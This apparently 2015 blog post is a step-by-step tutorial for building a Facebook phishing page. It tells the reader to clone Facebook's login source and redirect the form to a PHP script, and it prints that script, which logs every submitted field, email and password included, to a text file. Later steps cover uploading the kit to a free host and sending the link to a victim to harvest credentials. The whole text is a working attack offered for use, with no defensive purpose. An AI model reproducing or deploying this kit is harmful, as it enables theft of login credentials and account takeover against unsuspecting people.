Wednesday, 18 February 2015

How to create Facebook Phishing Page

1: Open Facebook
 2:Left click Any where on page and select Page Source
3:Copy Page Source
4:Paste It on NotePad


5:Press "Ctrl+F" And Type ""login_form" action=""

6:Select "https://www.facebook.com/login.php?login_attempt=1" and replace it with "log.php"

7:Now save it with name and extension of "index.html"

8:First Part is done :).                                                                         9:Open a New Document and Paste                                                   

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

in a new document with name and extension of "log.php"            
Now save an empty document with name and extension of   usernames.txt
 
10.Now u have to upload it in a web hosting site.                    

11.I prefer u to use 5gbfree.com because it will be easy to use                                                                                   

12.You have to make a account in that ,after that it looks like a picture given below.                                                  
13.Now go on file manager.                                                      

14.After that a new window will pop up.                                   

15:Delete all files in the directry (if any).
16:Now click on Upload.A new window will pop up named   "cPanel X".It will look like the following picture
17:Click on Browse and upload the 3 files we have created one by one
18:Now click on "Go Back to"
19:Your Page is ready.Send it to victom and when someone login to it his email and password will be saved in usernames.txt download it and you will find the username and password.



Hope it will help you.Dont forget to tell about it to others.